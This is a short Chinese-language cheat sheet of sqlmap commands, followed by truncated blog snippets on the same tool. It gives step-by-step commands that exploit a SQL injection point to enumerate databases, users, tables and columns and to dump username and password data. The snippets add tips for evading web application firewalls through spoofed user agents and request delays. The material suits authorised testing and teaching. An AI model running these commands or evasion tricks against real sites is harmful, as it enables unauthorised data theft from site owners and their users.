1. 找到注入點url
2. sqlmap -u url -v 1--dbs
列出資料庫
或者 sqlmap -u url -v 1 --current-db
顯示當前資料庫
3. sqlmap -u url -v 1 --users
列出資料庫使用者
--current-user當前資料庫使用者
4. sqlmap -u url -v 1 --tables -d 「testdb"
列出testdb資料庫的表
5. sqlmap -u url -v 1 --columns -t "user" -d "testdb"
列出testdb資料庫user表的列
6. sqlmap -u url -v 1 --dump -c "id,username,password" -t "user" -d "testdb"
列出testdb資料庫user表的id,username,password這幾列的資料
還可以加引數--start 1 --stop 100 就是顯示前100條
SqlMap常用命令
sqlmap是我們常用的一款sql注入漏洞檢測工具,為了方便大家平時的使用,在此分享一下我總結的一下命令。目錄結構 extra 額外功能 lib 連線庫,注入引數,提權操作 tamper 繞過指令碼 thirdparty 第三方外掛程式 txt 字典,例如瀏覽器 表,列,關鍵字 udf 自定義攻擊載...
sqlmap常用命令
sqlmap.py u current db 獲取當前資料庫名稱 sqlmap.py u tables d db name 列出指定資料庫的所有表名 列出指定資料庫 指定表的欄位名 列出指定資料庫 指定表 指定欄位的內容,c column name 可以省略,省略的話會列出當前表的所有字段內容 攜帶...
SQLmap常用命令
使用sqlmap掃瞄時,http頭部字段 useragent包含sqlmap等敏感字元可能會被waf攔截 可以採用模擬搜尋引擎訪問 user agent 搜尋引擎http頭 自定義useragent,防止cc流量攔截 delay 1 設定延遲時間 safe freq 3 請求延遲繞過一些waf可以使...